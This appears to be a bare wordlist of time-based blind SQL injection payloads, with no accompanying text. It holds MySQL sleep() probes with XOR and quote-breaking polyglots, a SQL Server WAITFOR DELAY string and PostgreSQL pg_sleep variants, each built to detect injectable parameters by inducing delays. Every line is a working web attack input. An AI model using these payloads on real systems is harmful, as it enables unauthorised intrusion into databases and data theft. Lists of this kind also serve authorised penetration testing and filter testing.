XOR(if(now()=sysdate(),sleep(5),0))OR'
if(now()=sysdate(),sleep(5),0)
(select(0)from(select(sleep(5)))v)/*' (select(3)from(select(sleep(5)))v) '" (select(0)from(select(sleep(5)))v) "*/
'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
1 AND (SELECT * FROM (SELECT(SLEEP(5)))YYYY) AND '7='
1'XOR(if(now()=sysdate(),sleep(5),0))OR'
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-1337
1 or sleep(5)#
' WAITFOR DELAY '0:0:5'--
7;SELECT PG_SLEEP(5)--
pg_sleep(5)
'||pg_sleep(5)--
'+(select*from(select(if(1=1,sleep(5),false)))a)+'
